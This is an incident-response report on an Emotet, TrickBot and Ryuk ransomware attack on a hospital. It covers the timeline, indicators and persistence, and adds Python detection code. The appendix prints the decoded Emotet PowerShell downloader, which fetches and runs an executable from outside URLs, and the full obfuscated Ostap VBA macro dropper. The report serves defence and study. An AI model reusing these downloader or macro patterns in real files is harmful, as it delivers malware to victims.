Cyrus Robinson : May 6, 2020 12:00:00 AM
The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and cybersecurity professionals face. Understanding the specific tactics, techniques, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight into protecting against and responding to incidents. In this paper, we explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it focuses on the TTPs and Indicators of Compromise (IOCs) to give an understanding of the attack chain that similar organizations face on a daily basis.
Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) from computer forensic evidence, then search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were reviewed during this effort. IOCs were also checked against various Open Source Intelligence (OSINT) sources to gather additional insight.
Emotet is a banking trojan with the ability to self-propagate, first discovered by researchers in 2014, and it has been continually upgraded and significantly improved since then. Emotet initially functioned as an information stealer; today, however, its customizable modules, popularity in Malware-as-a-Service (MaaS) operations, and ability to send information to and receive commands from Command and Control (C2) servers provide capabilities that criminal groups use to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment that leveraged Visual Basic macros to execute obfuscated PowerShell scripts. More recently it has also been deployed through other means, such as Remote Desktop Protocol (RDP) brute force attacks.
The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.
Ryuk, first seen in 2018, is a ransomware variant that extorts victims by encrypting their files and demanding a Bitcoin payment to decrypt them. Ryuk is another component of the MaaS ecosystem and is frequently deployed by Emotet and TrickBot. It is believed that the Hermes banking trojan developers are also responsible for Ryuk, and that this team is sponsored by North Korea.
Ostap is a JScript trojan downloader. Similar to Emotet, it is often spread via VBA macros in malicious email attachments. Ostap has capabilities that include disabling antivirus or security software and propagating by copying itself to other documents accessible from a compromised host, including network shares. One key difference from Emotet is that Ostap uses JScript to infect a host rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans including TrickBot.
Day 0 - 12:18:48 CST
Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at their JDMH email address. The subject line of the email was "Jane Buck - JDMH". The content of the message read "SOC report 01/16/2020" and was signed by "Fawn, Jill" and "Jill.Fawn@StagMedicalCenter.org".
Figure 1 - Spearphishing Email
Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the actual address in the email "from" field was not Jill Fawn’s email address. Rather, the email actually came from saad.alam@ziaudinhospital.com, a known Emotet sender email address.
Figure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34
The email contained an attachment named "QZ-2572 Medical report p2.doc". The email originated from 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.
Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/181.113.134.226/certificates
The ziauddinhospital.com mail server did not have a PTR record configured, so SMTP reverse DNS resolution could not be used to verify the sending host and the domain could be spoofed. In other words, ziauddinhospital.com did not actually resolve to 181.113.134[.]226; it should have resolved to 104.47.4.36.
Day 0 - 13:11:27 CST
Jane Buck opened the email attachment. The document contained a VBA script using the Document_Open event (which runs when the Word or Publisher document is opened) that launches a base64 encoded PowerShell script in a hidden window.
Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script
This script attempts to download 796.exe from five URLs, which appear in the decoded PowerShell script reproduced at the end of this paper.
The file 796.exe, an Emotet executable, is downloaded, saved as publishmsp.exe, and executed by the script. This file then downloads and installs the Emotet module nonsensor.exe to the c:\windows\syswow64\ directory and installs nonsensor.exe as a service (HKLM\system\controlset001\services\nonsensor). The Emotet service then establishes connectivity with 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. Once this foothold has been established, Emotet, TrickBot, and Ryuk begin deploying throughout JDMH's network environment. In addition to the initial infection files, the attackers also dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.
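Decoding and triaging the encoded command is the first step when this downloader shows up in EDR telemetry. The Python below is an added example, not code from the original report: it re-encodes the decoded script reproduced at the end of this paper into a constructed -EncodedCommand blob, decodes it, folds the string-concatenation and backtick obfuscation, and pulls out the URL list, drop path, size check and execution step. The regex folding is a heuristic tuned to this sample, not a PowerShell parser.

```python
import base64
import re

# Decoded Emotet downloader as quoted in this report (URLs defanged with hxxp/[.]).
DECODED_SCRIPT = (
    "$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';"
    "$Ibluqjxnvox=$env:userprofile+'\\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';"
    "$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;"
    "$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*"
    "hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*"
    "hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'.\"SPl`IT\"('*');$Szvomaww='Njfjtvcblfo';"
    "foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc.\"DoWnL`O`AdFIle\"($Ufiayanxhyox, $Ibluqjxnvox);"
    "$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox).\"LeN`gTH\" -ge 33113) "
    "{[Diagnostics.Process]::\"sTA`Rt\"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;"
    "$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')"
)
# Constructed sample of the "-en <blob>" argument: PowerShell encodes the script as UTF-16LE, then base64.
SAMPLE_ENCODED = base64.b64encode(DECODED_SCRIPT.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob):
    """Reverse -EncodedCommand: base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16le")


def deobfuscate(script):
    """Undo the string tricks used by this sample (regex heuristic, not a PowerShell parser)."""
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")  # 'ne'+'w-obje'+'ct' -> 'new-object'
    while concat.search(script):
        script = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    # "DoWnL`O`AdFIle" -> "DoWnLOAdFIle": a backtick before a non-escape letter is a no-op
    script = re.sub(r'"([^"]*)"', lambda m: '"' + m.group(1).replace("`", "") + '"', script)
    # .('new-object') / &('Get-Item') -> new-object / Get-Item
    script = re.sub(r"""[.&]\(\s*['"]([\w-]+)['"]\s*\)""", r"\1", script)
    # ."DownloadFile"( / ::"Start"( -> .DownloadFile( / ::Start(
    return re.sub(r"""(\.|::)['"]([\w-]+)['"]""", r"\1\2", script)


def extract_indicators(script):
    """Pull the URL list, drop path, minimum-size check and execution step out of the downloader."""
    s = deobfuscate(script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", s))
    urls = re.findall(r"h(?:tt|xx)ps?://[^'\"*\s]+", s)  # '*' separates the URL list
    size = re.search(r"\.length\s+-ge\s+(\d+)", s, re.I)  # size check before execution
    target = re.search(r"DownloadFile\(\$\w+,\s*\$(\w+)\)", s, re.I)
    drop_path = None
    if target:  # resolve $env:userprofile+'\'+$Dcdxsjdnbe+'.exe' -> %USERPROFILE%\796.exe
        expr = re.search(rf"\${re.escape(target.group(1))}\s*=\s*([^;]+);", s).group(1)
        parts = []
        for tok in (t.strip() for t in expr.split("+")):
            if tok.startswith("'"):
                parts.append(tok.strip("'"))
            elif tok.lower().startswith("$env:"):
                parts.append("%" + tok[5:].upper() + "%")
            else:
                parts.append(literals.get(tok.lstrip("$"), tok))
        drop_path = "".join(parts)
    return {"urls": urls, "drop_path": drop_path,
            "min_size_bytes": int(size.group(1)) if size else None,
            "executes_download": bool(re.search(r"Diagnostics\.Process\]::start\(", s, re.I))}
```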
Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the victim network, Emotet, TrickBot, and Ryuk were propagated to various locations on victim machines, including C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycle Bin (a common location malware uses to hide itself). Emotet and TrickBot are well known for their ability to propagate by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the novel methods used to propagate the malicious payloads in JDMH's environment was Active Directory startup, shutdown, logon, and logoff Group Policy scripts.
Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method as well as a persistence mechanism. However, quick actions in isolating infected devices and restoring servers from clean backups prevented the attackers from being able to rely on this as an ongoing persistence mechanism.
Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism
The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named “Windows Net Core” on compromised machines to re-infect with TrickBot and scheduled tasks named “comp_sys”, “comp_sys.h”, “user_userlogon” and “user_userlogon_h” on compromised machines to re-infect with Emotet.
Another, more complicated persistence mechanism was also used in the attack. JDMH used BitDefender Endpoint Security, deployed via a remote management and monitoring (RMM) tool, to secure their endpoints from malware. Unfortunately, BitDefender was unable to prevent Emotet, TrickBot, or Ryuk from infecting the environment. To make matters worse, the attackers exploited CVE-2019-17099, a vulnerability in BitDefender Endpoint Security versions 9.6.11.163 and prior, to perform a DLL hijack in order to achieve persistence. This vulnerability allows an attacker to load an arbitrary DLL file from the search path, re-infecting compromised computers with Ryuk. Cylance Optics provided insight into the Ryuk detections and showed that the Ryuk encryptor file was being reloaded on victim machines every time the EPSecurityService.exe service was executed.
Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism
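Both the scheduled-task and Group Policy script mechanisms above leave host-side evidence: Security event 4698 records a scheduled task creation with its name, and a Sysmon FileCreate (event 11) records files landing in the staging directories or in the SYSVOL Scripts folders that hold GPO startup, shutdown, logon and logoff scripts. The Python below is an added example, not code from the original report; it parses constructed events in Windows' rendered-XML schema and flags the task names and paths named in this paper. The domain jdmh.example, the policy GUID and the sample usernames are placeholders.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SEC, SYSMON = "Microsoft-Windows-Security-Auditing", "Microsoft-Windows-Sysmon"

# Scheduled task names the attackers created for re-infection (from this report).
TASK_NAMES = {"windows net core", "comp_sys", "comp_sys.h", "user_userlogon", "user_userlogon_h"}
# Staging dirs from this report; only executables dropped directly into them are flagged (nested vendor paths are routine).
STAGING_PARENTS = {p.lower() for p in (
    r"C:\Users\Default\AppData\Roaming\WinNetCore", r"C:\Users\Public\Junk", r"C:\Windows\Temp\bdcore_tmp",
    r"C:\ProgramData", r"C:\Temp", r"C:\Users\User\Public")}
EXEC_EXT = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".jse")
# GPO startup/shutdown/logon/logoff scripts live under SYSVOL\...\Policies\{GUID}\(Machine|User)\Scripts\
GPO_SCRIPT_DIR = re.compile(r"\\sysvol\\.*\\policies\\\{[0-9a-f-]+\}\\(machine|user)\\scripts\\")
RECYCLE_BIN = re.compile(r"^[a-z]:\\\$recycle\.bin\\")


def parse_event(xml_text):
    """Return (provider, event_id, {Data Name: value}) from an event rendered as Windows event XML."""
    root = ET.fromstring(xml_text)
    provider = root.find("e:System/e:Provider", NS).get("Name")
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return provider, event_id, data


def classify_path(path):
    """Reason a file creation matches this report's staging/persistence patterns, or None."""
    low = path.lower()
    if GPO_SCRIPT_DIR.search(low):
        return "gpo_script_drop"
    if RECYCLE_BIN.match(low) and low.endswith(EXEC_EXT):
        return "recycle_bin_drop"
    if low.rsplit("\\", 1)[0] in STAGING_PARENTS and low.endswith(EXEC_EXT):
        return "staging_dir_drop"
    return None


def hunt(events):
    """Scan rendered events: Security 4698 (scheduled task created) and Sysmon 11 (FileCreate)."""
    findings = []
    for xml_text in events:
        provider, event_id, data = parse_event(xml_text)
        if provider == SEC and event_id == 4698:
            if data.get("TaskName", "").lstrip("\\").lower() in TASK_NAMES:
                findings.append(("sched_task", data["TaskName"], data.get("SubjectUserName")))
        elif provider == SYSMON and event_id == 11:
            reason = classify_path(data.get("TargetFilename", ""))
            if reason:
                findings.append((reason, data["TargetFilename"], data.get("Image")))
    return findings


def event_xml(provider, event_id, **data):
    """Build a constructed event in the rendered-XML schema (test data; real events carry more fields)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="{provider}"/>'
            f'<EventID>{event_id}</EventID></System><EventData>{fields}</EventData></Event>')


SAMPLE_EVENTS = [  # constructed; jdmh.example, the GUID and the usernames are placeholders
    event_xml(SEC, 4698, SubjectUserName="jbuck", TaskName=r"\Windows Net Core"),
    event_xml(SEC, 4698, SubjectUserName="SYSTEM", TaskName=r"\Microsoft\Windows\Defrag\ScheduledDefrag"),
    event_xml(SYSMON, 11, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              TargetFilename=r"C:\Users\Public\Junk\publishmsp.exe"),
    event_xml(SYSMON, 11, Image=r"C:\Windows\explorer.exe", TargetFilename=r"\\jdmh.example\SYSVOL\jdmh.example"
              r"\Policies\{11111111-2222-3333-4444-555555555555}\Machine\Scripts\Startup\update.bat"),
]
```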
Day 1 - Shortly after 13:00:00 CST
The attackers began infecting computers with Ryuk ransomware. JDMH IT contacted their managed service provider (MSP) for assistance. JDMH's MSP immediately began isolating infected devices, gathering information to establish the scope of the ransomware infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow data and disabled the Volume Shadow Service on infected computers. The ryukreadme.html file gave orfhissipmay1970@protonmail[.]com as the email address for contacting the attackers.
Beginning at 11:25 CST, a JDMH user's credentials were used to send 3 emails from 37.221.113[.]166, a datacenter IP address in England. These credentials were presumably harvested by TrickBot during the initial attack and then used either by the same attackers in a second attempt to infect JDMH's environment, or, possibly, purchased on a Dark Web forum and used by a different attacker. The victim had not yet completed a global password reset, which meant that the attacker could use this account to gain access to the cloud-based email service. This secondary infection attempt underscores the importance and urgency of a timely global password reset following a credential harvesting or information stealing attack.
These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body of the email claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and contained a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body of the email claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and contained a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body of the email claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and contained a malicious document named "iss_cont_DT_174_23992.doc".
Figure 7 - Secondary Infection Attempt 1
Figure 8 - Secondary Infection Attempt 2
Figure 9 - Secondary Infection Attempt 3
All three malicious documents contain Ostap malware, using the same malicious VBA macro, which loads a malicious JScript file named "Dsaow.GaerIok.jse". If the Ostap file fails to download its payload, it attempts to replace other Office documents on attached drives and network shares with itself. The macro does not fully execute when run from Microsoft Word 2010, but when run from Microsoft Word 2016 it infects the host with TrickBot. The file then contacts ipecho.net (probably to check the victim's external IP address), cbl.abuseat.org, and zen.spamhaus.org. It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to inform the attacker of the victim computer's name, user name, IP address, and network adapter information. 185.180.199[.]77 is a known Ostap and TrickBot host located in the Netherlands. The TrickBot malware then attempts to establish connectivity with one of a number of C2 servers and download the systeminfo, msconfig, and pwgrab modules.
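The sequence described above (external-IP lookup, DNSBL queries for that IP, then a report to a .php page on a bare IP address) is a useful behavioural signature independent of any single C2 address. The Python below is an added example rather than code from the original report: it correlates those three stages per client over a short window in a constructed network log. The log format and the TEST-NET address 198.51.100.77 are assumptions standing in for real telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Behaviours this report attributes to the Ostap-delivered TrickBot stage: look up the external
# IP, query spam blocklists for it, then report host details to a PHP page on a bare IP.
IP_ECHO_HOSTS = {"ipecho.net"}
DNSBL_ZONES = {"cbl.abuseat.org", "zen.spamhaus.org"}
RAW_IP_PHP = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}/\S*\.php(?:\?\S*)?$", re.I)

# Constructed network log, one event per line: "<ISO time> <client> dns <qname>" or
# "<ISO time> <client> http <method> <url>". 198.51.100.77 (TEST-NET) stands in for the C2 host;
# DNSBL queries carry the reversed external IP (203.0.113.7) as a prefix, as the protocol requires.
SAMPLE_LOG = """\
2020-01-16T13:12:02 10.20.30.40 dns ipecho.net
2020-01-16T13:12:02 10.20.30.40 http GET http://ipecho.net/plain
2020-01-16T13:12:03 10.20.30.40 dns 7.113.0.203.cbl.abuseat.org
2020-01-16T13:12:03 10.20.30.40 dns 7.113.0.203.zen.spamhaus.org
2020-01-16T13:12:05 10.20.30.40 http POST http://198.51.100.77/3mBhb0/6VIJ7e.php
2020-01-16T13:40:00 10.20.30.41 dns ipecho.net
2020-01-16T14:02:00 10.20.30.42 http GET http://198.51.100.9/index.php
"""


def stage(kind, rest):
    """Map one log event to a kill-chain stage ('ip_echo', 'dnsbl', 'beacon') or None."""
    if kind == "dns":
        qname = rest.strip().lower().rstrip(".")
        if qname in IP_ECHO_HOSTS:
            return "ip_echo"
        if any(qname == z or qname.endswith("." + z) for z in DNSBL_ZONES):
            return "dnsbl"
    elif kind == "http":
        method, url = rest.split(" ", 1)
        host = (urlparse(url).hostname or "").lower()
        if host in IP_ECHO_HOSTS:
            return "ip_echo"
        if RAW_IP_PHP.match(url.strip()):
            return "beacon"
    return None


def find_beacon_chains(log_text, window=timedelta(minutes=5)):
    """Return (client, beacon_url) for hosts that ran all three stages within `window`."""
    per_client = defaultdict(list)  # client -> [(time, stage, detail)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, kind, rest = line.split(" ", 3)
        s = stage(kind, rest)
        if s:
            per_client[client].append((datetime.fromisoformat(ts), s, rest))
    hits = []
    for client, events in per_client.items():
        events.sort()
        for t, s, detail in events:
            if s != "beacon":
                continue
            recent = {st for t2, st, _ in events if timedelta(0) <= t - t2 <= window}
            if {"ip_echo", "dnsbl", "beacon"} <= recent:  # a bare-IP .php request alone is not enough
                hits.append((client, detail.split(" ", 1)[1]))
    return hits
```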
Fortunately, JDMH's environment was successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account and informing users not to open the email if they received it.
A list of JDMH computer names and user credentials was found for sale on a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, these were outdated computer names and credentials that had been subject to a global password reset during remediation efforts. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.
JDMH received a thorough report detailing the timeline of the attack and analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed their MDR hardware and software into JDMH's environment for the incident response efforts.
Powershell -w hidden -en <Base64 string>
This Base64 string decodes as:
$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')
cl_inf_HC_163_86818.doc, paym_req_EC_642_77095.doc, and iss_cont_DT_174_23992.doc VBA Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"
Private Kirfool As String
Sub RePac()
If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub
Private Function Herdio(i As String) As String
Herdio = Replace(i, "a", "")
End Function
Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
Dim ix%, va%, r%, c%, s%
r = prow
c = pcol
If psiz > 0 Then
s = psiz / pbl
If r < 0 Then
r = r + psiz
c = c + 4 - ((psiz + 4) Mod 8)
End If
If c < 0 Then
c = c + psiz
r = r + 4 - ((psiz + 4) Mod 8)
End If
If c >= psiz Then
c = c - psiz
r = r + 1
End If
r = r + (Int(r / s) * 2)
c = c + (Int(c / s) * 2)
End If
Mulent = False
r = r + 2
c = c + 2
ix = r * 20 + Int(c / 8) ' 20 bytes per row
If ix > 5 Or ix < 0 Then GoTo Dro
' c = 2^(7 - (c MOD 8))
c = 2 ^ (c Mod 8)
va = parr(0, ix)
If psiz > 0 Then
If (Int(va / c) Mod 2) = 0 Then
If pbit < 0 Then
Mulent = True
GoTo Dro
End If
parr(0, ix) = va + c
Else
GoTo Dro
End If
End If
If pbit > 0 Then
va = parr(1, ix)
If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
parr(1, ix) = va
End If
Dro:
Kirfool = """" + Kirfool + """"
ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
Mulent = True
End Function
Private Function Molert(i As String) As String
Molert = Replace(i, "y", "")
End Function
Private Sub Branolp()
Dim butilop As String
Dim xShape As Shape, xBkgr As Shape
Dim xAddr As String
Dim xPosOldX As Double, xPosOldY As Double
Dim xSizeOldW As Double, xSizeOldH As Double
butilop = Me.Content.Text
Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
Dim Ikolpppp7 As Integer
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Ikolpppp7 = FreeFile
Open Kirfool For Binary Lock Read Write As #Ikolpppp7
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Put #Ikolpppp7, , butilop
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Close #Ikolpppp7
FileCopy Kirfool, Kirfool & Molert("yjysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Kill Kirfool
Kirfool = Kirfool & Molert("yjyysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
End Sub
Private Sub Moon_OnDisconnected(ByVal discReason As Long)
RePac
Branolp
If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
Me.Close
End If
End Sub
Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
Debug.Print "to hui"
End Sub
About the Author
Cyrus Robinson, CISSP, MCSE, MCITP, CEH, CHFI, Sec+
Mr. Robinson is a skilled information security professional with experience working with diversified technologies and environments. His professional IT career began as an electronic forensics engineer while an active duty Airman, with primary responsibility for testing and evaluating digital forensic software, policies, and procedures. In this capacity, he worked alongside federal investigators and various DoD, CIA, FBI, NSA, and NIST employees. Following his active duty role with the USAF, Mr. Robinson went on to work in change management and system administration as a DoD contractor. He also has extensive experience in the roles of Information Security Officer and IT Director for a large medical group, which contributed to his knowledge of security risk assessments, HIPAA compliance, and drafting and implementing corporate IT security and business continuity policies. Mr. Robinson holds various industry standard certifications and a Master of Science in Information Security and Assurance.